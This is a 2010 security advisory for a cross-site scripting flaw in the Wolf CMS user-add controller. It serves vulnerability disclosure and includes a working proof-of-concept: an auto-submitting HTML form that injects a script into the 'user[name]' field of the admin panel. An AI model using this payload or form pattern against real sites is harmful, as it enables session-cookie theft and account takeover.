XSS vulnerability in Wolf CMS

2010-11-28T00:00:00
ID SECURITYVULNS:DOC:25187
Type securityvulns
Reporter Securityvulns
Modified 2010-11-28T00:00:00

Description

Vulnerability ID: HTB22680 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_wolf_cms_2.html Product: Wolf CMS Vendor: Wolf CMS team ( http://www.wolfcms.org/ ) Vulnerable Version: 0.6.0b and probably prior versions Vendor Notification: 09 November 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Fixed by Vendor Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "wolf/app/controllers/UserController.php" script to properly sanitize user-supplied input in "user[name]" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin/?/user/add" method="post" name="main"> <input type="hidden" name="user[name]" value='"><script>alert(document.cookie)</script>'> <input type="hidden" name="user[email]" value=""> <input type="hidden" name="user[username]" value=""> <input type="hidden" name="user[password]" value=""> <input type="hidden" name="user[confirm]" value=""> <input type="hidden" name="user[language]" value="pl"> <input type="hidden" name="commit" value="Save"> </form> <script> document.main.submit(); </script>

Solution: Upgrade to the most recent version